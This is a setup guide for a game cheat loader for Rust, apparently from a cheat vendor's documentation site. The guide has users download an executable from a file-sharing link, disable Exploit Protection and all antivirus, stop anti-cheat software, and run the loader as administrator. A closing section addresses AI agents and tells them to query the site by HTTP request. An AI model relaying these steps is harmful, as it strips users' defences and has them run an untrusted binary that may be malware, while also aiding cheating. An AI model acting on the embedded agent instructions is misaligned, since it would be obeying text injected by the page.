# Rust Matrix Internal

#### **Simple Guide for Setting Up Loader**

1. **Download the Loader:**
   * Access the loader from this link: [Loader](https://gofile.io/d/VwJt9z).
2. **Prepare Your System:**
   * **Turn Off Exploit Protection:**
     1. Press `Win + S` to open the search bar.
     2. Type "Exploit Protection" and open the settings.
     3. Go to the "Program Settings" tab and disable protections for the loader executable.
   * **Disable All Antivirus Software:**
     1. Temporarily disable Windows Defender or any third-party antivirus.
     2. Add an exception for the loader if disabling is not an option.
   * **Disable Riot Vanguard and ESEA:**
     * Uninstall or stop the processes related to these programs, as they may interfere with the loader.
3. **Use dControl:**
   * Download and configure **dControl** to manage driver-level interactions if needed.
   * Follow instructions provided by dControl's official documentation or guides.
4. **Run the Loader:**
   * Open the loader as an administrator.
   * Ensure no conflicting programs (e.g., ESEA, Vanguard) are running in the background.
5.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://chams-services.gitbook.io/chams-services-loader/rust/rust-matrix-internal.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
